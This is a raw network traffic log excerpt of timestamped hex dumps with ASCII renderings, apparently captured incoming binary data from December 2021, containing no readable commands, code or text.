                                                                                              2021-12-13 23:57:14 UTC3722INData Raw: 20 d8 a2 00 32 dc b7 cb 92 80 89 2a 8d fd 23 0c 74 8f 87 36 4b b7 0c 90 12 5f 4b 3d c7 fd 56 15 86 55 df 48 fe 59 82 e9 c2 e9 ea 24 95 f3 31 12 1a 79 c3 04 9e 8f 02 4a 65 cb ce 65 fb 1f c3 a6 38 05 6f 91 01 25 6c 99 bc 2c 3e 90 7d 6f ce ce 16 e1 9c 60 b5 33 a0 fd a4 8a 23 da e8 50 e6 8d 27 9c 17 69 65 7e 35 8f 42 d8 f2 03 10 4b f2 bf 76 8a 10 e4 84 ee 4c 29 99 60 c7 53 cf a7 62 87 2d 69 45 8e 56 d4 e5 22 11 8c 3a c8 2b 4c fc b8 02 91 2f 38 56 40 41 21 4e 13 73 f6 6d 7e 74 48 11 7e 6a 7b 66 d8 d1 29 2c 32 cf e7 ae 26 ef b7 d6 2a c2 3a 84 a7 3c 92 39 1d e0 3a 15 0a 6a f3 c7 a2 3d 39 e4 a0 34 ed c3 12 77 c3 37 01 37 77 76 20 20 be 1a 05 51 91 65 fc 9b e6 76 0e 80 1b 6c 71 ea 1d f6 96 14 77 a8 52 42 84 e3 14 3d 25 18 b6 ce 7f cf 48 39 4b 6b 61 95 a3 e0 48 48
                                                                                              Data Ascii: 2*#t6K_K=VUHY$1yJee8o%l,>}o`3#P'ie~5BKvL)`Sb-iEV":+L/8V@A!Nsm~tH~j{f),2&*:<9:j=94w77wv QevlqwRB=%H9KkaHH
                                                                                              2021-12-13 23:57:14 UTC3738INData Raw: f6 de 57 bb 37 4b bf b2 19 b3 96 97 45 27 54 25 fb 57 62 19 be 4c 9d 30 ad d0 0d ab fc cc 63 8d 02 00 17 f1 27 c2 0f 5c 3e d9 b6 fa 04 a5 0b 89 62 d1 7c c2 77 49 6c 7b 06 da 19 d2 40 a6 b9 58 d9 f0 da a1 37 41 60 c2 98 79 f9 84 58 43 56 9b d2 23 44 db 59 ab 9d 2d b6 33 4a 15 dc 3b cf 45 73 f7 8e ea 2b e3 49 88 79 22 23 76 84 f5 9e 73 4b 27 6a 47 e2 5c 68 c3 d3 c3 f3 c0 8c 25 f1 44 6c 17 ea 37 8e 8c 0c ce fc a9 ec df c5 b3 49 c0 ff ed 06 bb 60 20 62 48 55 0c 71 1d 59 06 b3 6c 44 11 06 e7 ba 0d 1d 24 f9 6a 7b 2d fa ea d9 db f0 3d 00 08 80 f7 7f 9f 63 52 73 e5 6c 0e 76 7d f5 4a 7b 53 bb bf 54 e6 5f 39 96 c0 be 86 25 c0 7f 1e 9b c9 c5 ec 8e f4 c9 4b 49 e7 ce 4d bc 94 51 89 00 db 24 ec 13 7b 15 8f 57 b8 07 7b fa ff ea 8f 0d 89 7e 74 33 f7 c8 84 17 53 72 de 8a
                                                                                              Data Ascii: W7KE'T%WbL0c'\>b|wIl{@X7A`yXCV#DY-3J;Es+Iy"#vsK'jG\h%Dl7I` bHUqYlD$j{-=cRslv}J{ST_9%KIMQ${W{~t3Sr
                                                                                              2021-12-13 23:57:14 UTC3739INData Raw: c2 0d c9 2a cf 0e cc e8 3c 35 ac 13 0a 12 43 bc a4 fb cd d0 88 d7 68 a0 6f a6 ed c5 39 cf 7a cb c1 a8 ea 91 c1 a1 1d 06 d7 52 f2 71 97 31 cf ca dd 0f 5a ba 41 1b d0 c9 23 e4 0e b7 7f 87 bd 91 1b 19 c7 48 a8 0b 49 17 23 c4 5e 43 3d 17 61 18 03 1f b5 4e 5e c1 26 ad e8 29 30 33 ab 6c 0d 93 7b c0 da ba 43 72 2a fc d7 17 9c 7d 70 00 4a 19 42 72 b1 35 ea ad 43 63 1c 2d 78 bb 6e ea 56 bd e8 26 9c 8c 5a 93 89 0d 6b 21 5e da 10 ea 0d 24 04 2d a3 09 63 d6 69 b1 15 36 11 e8 0a 9c b6 53 ca d4 61 78 20 ec 00 09 ed fd e9 e8 91 55 e3 67 a7 a0 b5 49 ee db 0d 6a 3d bd c2 d8 50 77 a5 0d a1 a0 ff 49 ef 1e ec 6c d8 a5 f6 d3 5b 0e fb fc f7 f9 6a ff a8 0f da cf 3e 35 57 49 e7 9e 7f 68 bd 04 67 45 fd a4 40 5c a4 e7 f5 32 9f 8d 28 06 ab a2 f7 f3 85 f9 0b 3c a0 4a c3 1b 4d b8 d7
                                                                                              Data Ascii: *<5Cho9zRq1ZA#HI#^C=aN^&)03l{Cr*}pJBr5Cc-xnV&Zk!^$-ci6Sax UgIj=PwIl[j>5WIhgE@\2(<JM
                                                                                              2021-12-13 23:57:14 UTC3755INData Raw: ac 5e 4e 3c a2 d4 f5 a5 b0 ba 6e b4 cc 2c 39 12 6b 90 ce 54 73 10 d3 b2 1c cf 1a 4e ae 55 01 9a e8 6b 9a 15 fc 22 2b 12 2f e0 9c 06 81 c0 0e 7b c7 f8 1b 01 d1 ec 61 76 89 be a2 27 5e a9 10 ea c3 ed ba a3 88 7b dc 57 c2 6f 07 f6 fc 9a 62 c9 ce 23 d9 3a f0 da 95 b9 8b c2 58 72 3e f6 af 9d 73 38 ae e9 16 a0 67 50 8e c9 99 84 5d 05 63 b6 d8 2b 44 65 55 91 c2 54 2b 74 68 ed f2 9d 96 28 13 e1 4c cd df a4 8d c0 9f d1 df 24 4b 75 5c 3d af 68 dd 2c 76 bd 36 0f d0 c8 22 c0 e7 6f 8a b2 20 bf 91 ba 83 8a 5c 2e 75 eb ce ea 91 57 c5 0c c5 34 d0 e6 82 3c 2b ff 2a 5a 93 69 70 d9 e6 b0 04 07 07 6d 4d 81 1b cf 72 1f 57 15 ee 1f 7b 3c 31 7a d7 7e 59 1d f2 4f ef fb cb 2d 09 f1 33 36 a9 a1 46 b0 33 93 ab 9e 28 f8 00 22 a1 da f7 af 00 20 ea bd 74 58 2a b5 bf 62 31 3c fe 7f b6
                                                                                              Data Ascii: ^N<n,9kTsNUk"+/{av'^{Wob#:Xr>s8gP]c+DeUT+th(L$Ku\=h,v6"o \.uW4<+*ZipmMrW{<1z~YO-36F3(" tX*b1<
                                                                                              2021-12-13 23:57:14 UTC3756INData Raw: e0 1b 9d 8c 32 24 ba f0 6f c6 4e 8a e8 97 7d f8 1a 60 e6 26 65 0e f5 c7 7d 97 11 86 89 72 c2 74 3f 79 c3 29 dd f9 89 07 46 f7 09 91 de 94 3f 18 52 8e 82 67 6e 5d dd dd a9 39 14 a2 b4 96 52 89 36 a3 0a 26 ec c5 81 22 5c e0 60 8f 82 e8 c9 c0 95 ab 8f 91 67 82 65 80 43 3a 8f 51 a4 0f e1 1a 5c d5 86 4d a4 e6 e9 45 f5 b9 6f b8 3d 4f 90 92 86 2a 53 93 ed 94 17 5d ae da bd c4 23 5a 45 f4 61 df 72 18 11 fb e5 7e 9b e4 98 0f 7e 1d 67 13 3d 61 99 55 29 47 ad 99 bc 85 88 83 20 1b 25 e7 b2 09 aa e1 d4 44 a4 f1 07 88 14 49 92 8d 34 cb 33 0b 35 10 92 5f 45 5e 8f 1f 19 a0 da 3a ac 75 54 61 ca fb 70 6f af a5 33 15 70 0d 5d bf 88 ad db 89 88 91 49 8c 25 cb 8d 61 21 1c 62 48 c7 cf 49 5b fa c5 2b a4 e0 6d 3a 02 1b 94 68 10 f4 58 6d 81 3f a7 42 7f 3a 18 b3 44 84 d8 25 10 2a
                                                                                              Data Ascii: 2$oN}`&e}rt?y)F?Rgn]9R6&"\`geC:Q\MEo=O*S]#ZEar~~g=aU)G %DI435_E^:uTapo3p]I%a!bHI[+m:hXm?B:D%*
                                                                                              2021-12-13 23:57:14 UTC3772INData Raw: 46 44 70 c4 c0 6e bd 4c a5 9c 11 67 81 18 49 4a c0 e0 17 dc ea 67 5a b4 2a 39 c0 52 8a 8a ad 8c de 8e 56 bd 2c b0 cc 2e 97 5c 03 7f 05 8d a3 06 cf 6b 03 8c 65 c8 65 63 46 a5 6f 10 4d 3d bc c6 7e f8 e3 70 45 ee cb db a6 2d bd bb 7c 45 f7 70 cb dc 38 67 c4 7e 7d 2d fc f6 88 b4 20 71 b3 99 5f f9 81 78 ec e3 0c a7 5d 21 cc 90 c6 d8 05 a3 ce 56 81 d2 20 9c ae d4 54 ed 50 93 f7 61 b0 e0 42 b5 fd e4 11 80 a8 1a 93 e7 1e 28 37 08 1c c5 72 b9 04 af 45 4e c1 3f 7b ba 5f c7 9c b8 d2 aa 2f 2f c2 d1 6b a5 9e 0a 33 7e ca 7e f3 5e 31 aa 74 50 da 2c 8d b2 26 78 bc 2c 7b 40 a3 45 35 46 f4 ed c3 86 6f bb cd 30 c9 80 0f 85 73 e1 0a 14 2b 3a 05 a9 82 b6 ae a0 17 f8 a9 15 84 84 7d 53 d7 63 bb 64 00 b8 52 b1 37 81 8d 05 3c b1 fe 2b 3c 23 e5 8e 8d 85 98 ee c9 d0 aa 60 75 9f 7f
                                                                                              Data Ascii: FDpnLgIJgZ*9RV,.\keecFoM=~pE-|Ep8g~}- q_x]!V TPaB(7rEN?{_//k3~~^1tP,&x,{@E5Fo0s+:}ScdR7<+<#`u
                                                                                              2021-12-13 23:57:14 UTC3773INData Raw: d1 30 27 7e 8c 3a 90 f1 90 9f 45 c4 b3 20 d7 be 34 33 fd 11 a8 d2 c9 be 02 2a 37 4f 9b e1 a1 b3 18 3e cf f1 ac 53 65 82 87 34 10 05 da f7 0e 95 4f f3 56 04 52 f0 2c 0d 1c 9a 6f a0 b7 ac 53 af 71 fd a8 95 ca 03 a9 21 4c be d1 e6 69 9d 8c a6 ee 6d 91 42 44 48 b7 14 f9 85 9b 84 a8 8c c3 2f 8f c8 ae cf 54 e8 22 5e 0b 95 38 ff 93 0d fe 90 5c b6 1a 6f f7 36 9c d0 6d f4 1d 4a 3b c0 0b 57 b1 64 50 a5 81 cb 28 69 6b ac 76 a7 38 87 c5 41 51 ba 6c e7 ce a7 21 c0 ed ce ab 91 f8 cc 86 80 dd fc 2e 2c 78 65 46 61 11 63 2d 30 18 7e 7f a9 97 78 4c 52 b0 cf c1 2d 25 82 51 25 5e 13 56 41 54 50 d9 1f 5a 9d e2 be 9f ac c1 a7 6f b3 7e 8a 45 e9 82 4e 92 4b 08 94 9f 82 4b 89 12 9e 59 0f a3 b7 bc c6 39 ab 4e fe 82 64 d5 79 64 10 86 f3 45 a0 7e 49 29 e4 f8 83 37 11 6d ab ff ae 06
                                                                                              Data Ascii: 0'~:E 43*7O>Se4OVR,oSq!LimBDH/T"^8\o6mJ;WdP(ikv8AQl!.,xeFac-0~xLR-%Q%^VATPZo~ENKKY9NdydE~I)7m
                                                                                              2021-12-13 23:57:14 UTC3789INData Raw: 2c 1b 8d 33 76 40 3d b3 3d 58 3f 38 30 68 f2 c1 59 4f 73 2f 21 6c c7 43 e6 31 dc 93 d3 87 98 c8 39 26 50 37 11 93 5f 27 ca ea b1 3d ec a3 66 64 ff e4 5f 68 1f 1b 71 c1 8c 5a 3f 26 70 81 e5 9a b5 c7 71 f6 b3 73 ce 49 ff b3 ac bf 5d 69 00 6d 98 4b ab 62 a1 ed e3 28 23 4b 81 e5 6a 91 5a 7b 23 f8 4d b5 31 ba 17 02 c7 67 73 4b 7b 99 f6 e7 50 27 bd 70 ba 00 12 7d dc 5e 25 28 e4 d1 bf bd d7 88 19 e8 67 67 f6 3d 52 40 8e 55 92 ed 8b 10 fe 35 1b 2e e3 31 f1 77 b2 b2 fd 42 c2 72 3f 13 a3 30 d8 83 12 90 be 8e d5 c4 aa b9 42 71 91 b1 31 c8 1a e2 a8 3d 65 d6 29 16 e8 1a 35 b5 f4 ea 60 7b d1 8f fb d0 ef 6d f2 02 2b b8 c8 cb c6 33 eb d2 ce b5 e1 ab ca 1d df 14 2a 3e db 1e 2c 86 62 5d 7e da 06 7e 5c 73 b0 4a 97 57 e8 df e6 af 2d 3f 5e c3 a7 51 4a de a1 ac 09 cd 13 09 d9
                                                                                              Data Ascii: ,3v@==X?80hYOs/!lC19&P7_'=fd_hqZ?&pqsI]imKb(#KjZ{#M1gsK{P'p}^%(gg=R@U5.1wBr?0Bq1=e)5`{m+3*>,b]~~\sJW-?^QJ
                                                                                              2021-12-13 23:57:14 UTC3790INData Raw: 37 2e 2a 62 4b e2 5d c5 db 93 e9 ca 48 aa 62 4c ef e2 fe cb e6 ba 4a 9f c0 26 e7 25 be ff 52 e3 f8 5a a5 bc 8f 8d f8 0f 18 18 62 53 27 1f 53 05 a8 00 87 dc 93 e7 d2 f6 e7 ef 72 00 75 a4 29 5e fd f9 09 0c 8c c4 12 85 86 ad 31 8c 9c 0c a2 b0 2d 13 38 02 48 eb 3c 64 42 22 cb 24 85 91 ba c0 eb ec e7 4f ab 82 b1 03 c1 73 9d bc a4 50 50 a4 27 a3 07 f8 f2 56 26 a9 da 8f 58 4e b6 24 c8 4f 5b 06 47 bf 1b 34 39 38 36 5c b1 fc 3c c6 66 52 41 3e 79 55 d4 90 dc bb ce 74 5a 29 d9 40 b6 69 0d b8 d3 94 df cf 2a 29 cc 7a a0 06 62 d6 96 e7 cd 3c c9 f4 f3 64 a3 23 d5 98 a1 bc 41 55 a4 7b c4 63 a2 99 71 11 d5 db ed 77 96 f7 13 f4 42 21 9c e3 bb a3 11 8f 76 f9 f5 32 19 54 9e df 44 b1 08 a9 9c 82 14 2c 09 3b fa 03 ff a5 90 1e 55 8b ce 3b 1e 85 10 da 0f 2f 6b 94 3c 6d 51 29 51
                                                                                              Data Ascii: 7.*bK]HbLJ&%RZbS'Sru)^1-8H<dB"$OsPP'V&XN$O[G4986\<fRA>yUtZ)@i*)zb<d#AU{cqwB!v2TD,;U;/k<mQ)Q
                                                                                              2021-12-13 23:57:14 UTC3806INData Raw: 38 c7 0e 7d 0e e7 64 01 b4 25 47 53 76 2e 10 ce 88 1b 1e 2a 0b 6d 48 95 ff 01 21 b6 d2 53 3d 04 e1 e6 63 85 a2 0d 63 38 08 95 5f 5d 15 46 55 1d 18 99 60 7a e8 30 28 36 79 bf d4 10 d3 47 e9 b5 74 c5 71 3c 4e b3 da cf fa 7c d4 a1 43 61 ba 65 1a 40 ad f6 44 04 54 fb 9e cc 23 1d a5 6c 36 96 42 4f f1 68 44 85 f4 9e c2 32 b1 76 42 0b fa 91 94 4e 4e f1 24 18 cd 6e 68 53 6b 7b 74 8d 70 7e e3 2f 65 e9 e9 a6 83 b1 81 3c 69 d4 5b af c3 d2 6c 8c ef 63 04 86 1f 59 6f 4b 5e 9f c2 60 00 dc 73 0e 69 f8 05 7a 4a 9e 39 a7 b6 44 60 d7 c4 24 a3 84 c2 50 3d 8d 35 3e b2 b9 38 c9 67 de 91 77 69 db a1 15 fe c8 51 d0 82 03 af 58 61 52 1b 0b 9b 1d af 86 f0 46 eb c3 67 7e b1 ba a9 90 68 90 81 ba f1 28 62 5a 1e 47 a9 0b 35 9f bd 1d 27 cd 62 8f 96 d5 1c 70 cd 5f a1 cf f6 53 e3 c3 c8
                                                                                              Data Ascii: 8}d%GSv.*mH!S=cc8_]FU`z0(6yGtq<N|Cae@DT#l6BOhD2vBNN$nhSk{tp~/e<i[lcYoK^`sizJ9D`$P=5>8gwiQXaRFg~h(bZG5'bp_S
                                                                                              2021-12-13 23:57:14 UTC3807INData Raw: 88 62 36 7c ac 27 76 66 2f 1f b9 dc d5 3a 78 f5 bf d9 1a 5f 7e 7e d8 19 8b 28 6b 2b bb c0 83 c0 88 62 8e da ec 55 d3 66 a2 d9 52 15 d9 d5 00 d9 78 4a f2 40 43 26 59 67 7e 39 dc 49 2b 7a 95 71 74 f9 1e 27 16 0a 3b 61 55 15 c5 23 4b 98 e8 b0 7b e3 90 ba 4f d4 c6 b8 7a d6 35 a9 6e 1e e9 10 87 2b 77 98 00 bb ba 06 15 d5 ac a3 58 89 de 51 77 2c 10 d0 1a 3a 88 20 11 2a 26 a8 1f 35 cf 31 af 76 ca be d6 15 c1 b1 c0 00 7f 6f 0f 70 1a a7 30 24 9a db e0 e0 dd 7b 6b 2d cd 58 c2 d8 fd 1c 44 15 2e 34 3f f2 84 01 2a 34 8d cc 36 fc a9 37 51 21 f8 23 ce 34 61 ce 3d 84 01 24 90 3b f3 0b 7d 33 86 6c 7d 67 de 8a 1a 08 c7 0c 7e f5 3c f3 9c 17 20 bd 79 8d e4 81 59 cc e9 bc ef 1a f8 1d 1e 9f 19 9e 36 ce 17 f6 a4 e1 48 d9 72 b8 92 2c f7 b5 1e b0 36 ba fb f5 2e dd c1 7a bf 48 73
                                                                                              Data Ascii: b6|'vf/:x_~~(k+bUfRxJ@C&Yg~9I+zqt';aU#K{Oz5n+wXQw,: *&51vop0${k-XD.4?*467Q!#4a=$;}3l}g~< yY6Hr,6.zHs
                                                                                              2021-12-13 23:57:14 UTC3823INData Raw: 45 50 0f 6d ff 09 ea 24 e3 cd 1c 37 4a 28 38 be e3 96 5c 0d 93 50 a8 be 2d f8 2d 70 43 a0 5d 39 e4 29 2d 9c b4 5c 16 12 07 ab 22 11 72 2a 03 f0 b9 84 bb 91 45 c7 7a 7e 8a 71 73 ff 68 e0 f4 88 54 24 92 fc ff 45 ae b4 80 90 8d 12 01 b8 09 a2 d5 6b f1 94 d7 d6 1a 2f 94 82 2c 92 05 fe 1d 60 79 8f 0c 02 5d 60 bc 09 e0 a9 95 6d ea e2 74 10 aa 2e 3c db 44 f7 a4 2a a4 dd 61 08 eb 67 01 f4 4b 25 56 4e 43 fc 4f e7 5f f4 81 81 22 e7 f5 be 18 b6 b1 96 b6 c1 4e 9f 89 ec 3b 0e ea d6 9e a5 c0 1d 59 36 17 42 6e 04 b3 bf d1 e5 79 c3 99 77 b8 1c d0 19 09 ed cd f1 7c 51 8a 07 06 28 0b dd e2 af 85 c1 60 9f e5 75 bb 2e 2a 5a e9 39 e2 25 ae a5 d1 73 f6 94 ad f0 a6 d3 da 64 7c 8d ea eb ce d1 e5 6d cb 8d cb ba b3 e0 95 25 ff 18 94 b3 b7 a6 37 be 60 20 d5 8e ec 88 22 15 06 95 fa
                                                                                              Data Ascii: EPm$7J(8\P--pC]9)-\"r*Ez~qshT$Ek/,`y]`mt.<D*agK%VNCO_"N;Y6Bnyw|Q(`u.*Z9%sd|m%7` "
                                                                                              2021-12-13 23:57:14 UTC3824INData Raw: c5 6a 56 2c c1 63 13 65 8b 25 21 f6 9d fe c8 c4 5e bc a5 2d de 0a f2 b3 82 b8 ef 95 9b 12 73 44 e8 9b 31 dd b8 88 76 18 dd 9c f4 73 f7 b7 1b b1 f5 cf 4a 61 2b df cd 06 e4 f7 77 4b 50 d9 db 1a 75 32 2f 95 8d 3e 2b a2 1c 99 50 5f 79 bb 4d b1 11 38 f0 04 3e 8f 7a 49 15 bf 5c d3 a1 92 47 b0 b1 b5 73 00 45 27 c8 60 49 a1 c3 41 5e 79 95 e0 8d ea d7 a2 60 74 19 3e 56 80 30 c1 2d b3 73 f5 1a 00 dd e2 f4 43 a6 36 52 af f2 fb 8d 6d 21 58 cf 35 b5 d1 92 0e 97 d4 48 30 68 08 09 c0 1a c0 bd e3 6b fc f3 2d 0f 94 6f 1e b9 68 53 c3 9b 2e 7c b6 26 78 af b3 0d 2a 8d ef bd 37 ef 7f 3f c8 54 82 88 bc e5 3f 36 8d ad 90 5b 46 f3 c2 01 61 17 89 f8 32 d5 a9 bf b9 21 a3 df 1d c2 8c a0 30 0d 04 ea 30 97 0f 37 75 57 5e 5b 7b ad d0 38 9b 7a 3e dc 8c 4e 4f 35 37 10 77 c4 7d cc b9 c1
                                                                                              Data Ascii: jV,ce%!^-sD1vsJa+wKPu2/>+P_yM8>zI\GsE'`IA^y`t>V0-sC6Rm!X5H0hk-ohS.|&x*7?T?6[Fa2!007uW^[{8z>NO57w}
                                                                                              2021-12-13 23:57:14 UTC3840INData Raw: 38 58 d0 34 90 36 53 7e 71 cf 23 97 7a b2 da bb 6c 82 f2 b3 a5 16 8a a5 7b 1e 64 14 c7 44 76 bd a0 0e 23 18 8e d4 54 83 94 14 49 df 3e 3b 33 5e 8f 86 d4 30 c1 7e ed d1 98 7c 97 bc 6c df bf fb 3d 23 7e f1 04 4f 9d 22 54 4f 51 9a 0f 7b 55 d4 e2 f0 c4 bf bb 78 16 9a d5 75 e1 a7 03 ae fe 90 3f 28 3b 69 ee 80 5d 3a 53 3b 2d c3 5c 9f 56 26 bb af 15 6b 87 53 2a 33 c1 8c 65 ce 92 d7 64 3b 48 17 c0 36 f3 16 92 c4 88 46 c6 cc 08 b5 b6 10 61 44 c9 c5 61 eb 1e 8b a6 93 8c e3 1c 94 04 66 30 77 9d 62 6b cc a4 74 74 62 54 93 ac 58 72 23 72 64 69 10 ac 5e 2e fa 40 9e df b5 bb 1c f2 b5 78 fc d7 ed 8d b3 fb 2b ce 43 fc d1 81 e3 eb 09 04 f3 25 16 aa 54 f5 2a 2a 83 f9 6a 57 3a 76 2a b5 74 63 53 be ce 5c 4f 5a 57 76 f2 29 38 65 2c 41 28 be ec 95 5e 15 85 01 ab a0 3c 66 d7 25
                                                                                              Data Ascii: 8X46S~q#zl{dDv#TI>;3^0~|l=#~O"TOQ{Uxu?(;i]:S;-\V&kS*3ed;H6FaDaf0wbkttbTXr#rdi^.@x+C%T**jW:v*tcS\OZWv)8e,A(^<f%
                                                                                              2021-12-13 23:57:14 UTC3841INData Raw: 06 45 bf 15 42 12 5f 5e 15 70 b1 c1 11 1b 76 70 2c 1c 5a 43 40 23 93 a9 d6 db b7 a7 0e de d1 bb 84 86 ea 35 c5 55 d9 68 4f c1 9b e4 fd cc be 36 d6 2c c1 9b 5a 26 16 1e 00 5f 03 a1 d9 f0 25 3d 5e ae aa 4a 9e 83 bb f8 7d 3b 9f 0c e8 ac 53 46 47 72 f7 41 76 2c 8b e8 b0 b6 6e c6 48 a6 4c 23 fe 75 dd e6 58 f3 27 79 f3 b9 84 c1 e4 1d dd b4 d7 80 22 1b f9 1b 2a 2a 29 98 90 fc c5 e5 64 23 03 cc 2a cd 01 38 ee e0 7b 6a 3c 85 77 46 43 df 73 7b 04 51 7e e4 f0 ff 0c f0 ae 1e fa d5 2b 2e 0d 06 a4 c8 23 b3 1f 5e ea 5a 22 e3 d7 c2 48 4f c6 26 dc 2a 0c 25 71 2b f8 a6 92 ab 22 bb cf 57 19 37 92 fa a9 ef 80 11 39 fa 15 47 18 a3 fe 2b 77 48 2f 93 7a 5b 55 06 17 23 db 16 ed 7c 84 66 27 be ae f8 f5 5f 51 5b 88 a0 42 f5 ad a6 a7 3c 77 9f 92 8d 21 11 ee 82 87 38 af 47 97 8d 22
                                                                                              Data Ascii: EB_^pvp,ZC@#5UhO6,Z&_%=^J};SFGrAv,nHL#uX'y"**)d#*8{j<wFCs{Q~+.#^Z"HO&*%q+"W79G+wH/z[U#|f'_Q[B<w!8G"
                                                                                              2021-12-13 23:57:14 UTC3857INData Raw: d2 f2 09 83 4e 05 05 15 33 d2 ee 50 02 2f dc e6 c1 62 d6 53 d0 dd f6 df b8 cd 6e ab b6 9f b9 18 00 86 02 c1 fe ed 6c 67 eb ca 64 d2 be f7 2b 61 b9 cc 77 e4 14 72 b0 45 87 1a 63 83 94 ce 17 e0 5d 25 78 e4 61 8c 0f 40 44 18 0c b4 2f 32 4c 9d c7 bb d0 f6 68 a6 dd 31 44 ce ae 95 a7 35 07 a8 ec 21 f4 52 6d 13 17 2a 5a 08 47 7a f7 34 9b f2 4d bd 91 2c 9e c0 6f e3 b4 47 d8 57 10 ea 1f 70 e8 86 12 57 35 90 f9 4c b6 14 17 05 b1 ab 91 4f a2 85 a3 c9 dd be 8b a7 15 59 64 9d 29 7d 12 00 c7 38 54 d4 c4 e0 5f 85 43 fa ef 0c 37 14 0d 6c 5e 34 f7 58 84 ec 6a de df d7 88 59 77 92 d1 86 07 e5 4a 2d f2 ea 77 bc c8 4a de 00 e7 7d bb 7c 08 92 66 4e 93 73 8f 85 62 44 b7 95 e6 92 5f b1 1d 9a 7d d2 41 16 fc 64 0c 09 d1 88 25 b8 6f 5e 09 bf 72 f0 f1 1e a9 3f 00 37 23 6e 6d 1b e5
                                                                                              Data Ascii: N3P/bSnlgd+awrEc]%xa@D/2Lh1D5!Rm*ZGz4M,oGWpW5LOYd)}8T_C7l^4XjYwJ-wJ}|fNsbD_}Ad%o^r?7#nm
                                                                                              2021-12-13 23:57:14 UTC3858INData Raw: 79 0b aa ef 3c 7e 68 38 29 fc 5d 09 43 eb 50 72 65 fb c6 f5 52 73 50 8a 1f 05 b7 02 73 74 89 b5 3b 32 a6 1c 31 a9 34 b4 dc 7e f9 48 45 3e 63 1c 31 9f 5e 1e f1 3a b7 4a 94 ec c4 1a 2f f4 92 7e 68 09 96 56 a2 f4 ab b2 52 52 57 6e bd 07 eb 2c 33 a1 4b fa 17 f2 c8 3a b3 e4 ba 3b 5a 29 46 f1 5e 6c 7d 2e c9 a0 85 17 f1 9a c7 45 b2 2a ba d3 30 cd 52 cd be 75 1e 5e 64 5c 27 53 ad a2 20 7b 5b 81 6f 11 fa 64 5f da 6b 01 44 c5 04 57 0c 25 03 41 ec 08 f3 f7 c6 7c 47 20 c1 42 7c e6 f4 d4 79 e9 35 a5 34 79 b1 4b b1 66 08 80 f7 05 bd 9f 35 de 93 4d 43 36 ac ec 52 b4 7f 40 4c 91 c8 4c 4f ac 79 e0 90 f9 7e 05 04 ae a0 96 7e 5d 56 80 72 29 ec c9 0c 6f d1 05 1b c6 fb 52 33 10 39 f2 c3 c8 84 77 3c cf f0 5e 2f d6 b2 9d 9d d5 26 c5 2b 1b b1 d8 0d ca 93 7f 10 57 a5 60 36 0c ed
                                                                                              Data Ascii: y<~h8)]CPreRsPst;214~HE>c1^:J/~hVRRWn,3K:;Z)F^l}.E*0Ru^d\'S {[od_kDW%A|G B|y54yKf5MC6R@LLOy~~]Vr)oR39w<^/&+W`6
                                                                                              2021-12-13 23:57:14 UTC3874INData Raw: 98 ce d6 37 cf b7 23 dd 04 87 ba bf f4 b2 7e 4f 45 c4 89 0c 30 8e dd 64 d1 e4 ad 90 f3 4d 44 a7 44 40 c7 9c fe 48 75 61 20 51 53 eb 12 d7 59 19 29 e6 fe 8c f8 e2 ad b1 ce 53 a3 47 76 e9 83 d3 7f a2 54 1f 87 70 c8 ea b8 d0 29 29 7c ca 0c ea e4 a8 51 e1 d6 18 96 b6 5c 23 9e 5f d9 f7 98 c0 78 4c 1b 00 d7 54 9e dc 77 98 02 2a ab ec bd 2c 31 92 52 1b 9b bd 78 89 0a 2e d0 e7 1c 51 06 10 00 b0 61 8f 2e 21 d8 4c bf a9 21 fb e5 66 97 22 7d 7d bf fb bd b3 45 3a 03 c0 67 a2 54 ae b9 14 84 e8 00 0c bc a0 ec 67 20 63 43 82 c3 6e ed d1 73 cb 93 07 8a f9 7e 14 1d c7 3c b2 c4 bc e3 d2 06 09 d8 c4 7c 5e c6 17 54 e8 d4 4c 0e 34 3d 9c 1f 5f 58 e0 0c 7f f5 8b f8 7d e2 0b 4f 00 0a 30 93 f1 b6 1a 9d 24 b4 0f ba e8 16 12 b6 b8 62 4e c6 fa c2 bc 07 f2 95 36 85 c8 17 a9 73 9b 68
                                                                                              Data Ascii: 7#~OE0dMDD@Hua QSY)SGvTp))|Q\#_xLTw*,1Rx.Qa.!L!f"}}E:gTg cCns~<|^TL4=_X}O0$bN6sh
                                                                                              2021-12-13 23:57:14 UTC3875INData Raw: 80 2f 14 7b b3 3f b1 e7 00 4a 8c e2 4d 6c 38 1d 40 f2 5d c9 b3 9d e4 53 a6 c4 f2 d0 00 06 30 fc ce 86 c8 52 3f 2f 3f 34 b0 af 6a fc 9e 13 30 97 12 a6 14 a3 84 91 96 3f ce 6e f7 76 93 64 27 96 22 62 f9 11 18 cf 91 32 21 f4 2a 4f 23 0c ed e7 9b 8b ee c3 32 d1 89 39 b8 87 cb db 88 a3 16 2a c3 53 2c 14 57 b6 ec 14 ba 4f 47 a7 de f6 ff 2d 4d c0 dd d9 e8 21 2c 97 b8 34 a9 89 3b e8 b7 d2 80 7c 7b b0 d5 c2 b8 c3 ba 09 0c e6 cd c7 fa 70 33 03 93 ba 2b d4 e0 c2 8c a4 8c 7d f5 eb 76 40 28 8d 3d ca 00 a0 88 f9 f5 04 54 e2 0e 69 43 a8 d0 d0 cd c8 70 b2 e7 bb af 94 cd dc 8a ed 34 22 4d 75 36 19 02 11 53 61 23 58 ef eb e1 8a 48 43 fd 49 04 3d 57 cf 6a c3 e0 d9 35 38 ab 2f 19 bc b6 35 e3 2b be 54 96 e2 6b ee cc 42 cf bf 38 4f 49 af d8 90 4d 66 52 2c 70 43 74 ac 60 04 98
                                                                                              Data Ascii: /{?JMl8@]S0R?/?4j0?nvd'"b2!*O#29*S,WOG-M!,4;|{p3+}v@(=TiCp4"Mu6Sa#XHCI=Wj58/5+TkB8OIMfR,pCt`
                                                                                              2021-12-13 23:57:14 UTC3891INData Raw: b2 16 dd 62 8a f6 18 3d 96 43 75 96 53 c5 b2 35 85 a9 64 6a 3e f3 6c e9 8c 1c e4 22 6d bc c8 3e 56 07 a6 fc 58 46 2c 67 7a 6a cd be e5 fe 2e 06 ef 6f 1e 8f e2 cb 47 e0 45 d7 58 56 d0 c2 78 39 3d f6 96 6b ed 36 7e 71 d8 cd b1 0b ed b6 8c 01 26 c7 53 97 f3 0b b7 0a 5b 66 48 52 63 58 14 60 35 90 87 e4 96 e1 68 b9 f5 72 b9 7a 38 d3 1f a1 dc fd d7 2c f1 26 6f b6 c0 b7 2a 1f c5 b7 03 0e 1d ba 1a 8b 04 fa 00 81 54 8a 8e f7 15 2a bf e5 60 be a4 8f c1 d9 55 65 4d f0 a5 f1 0a f3 d0 b3 0c 5d f4 38 e9 1a 40 a6 52 28 dc 6c 0d 42 cd 2a 3f ad c0 d8 05 29 8d ae 59 d5 52 69 b9 20 4b 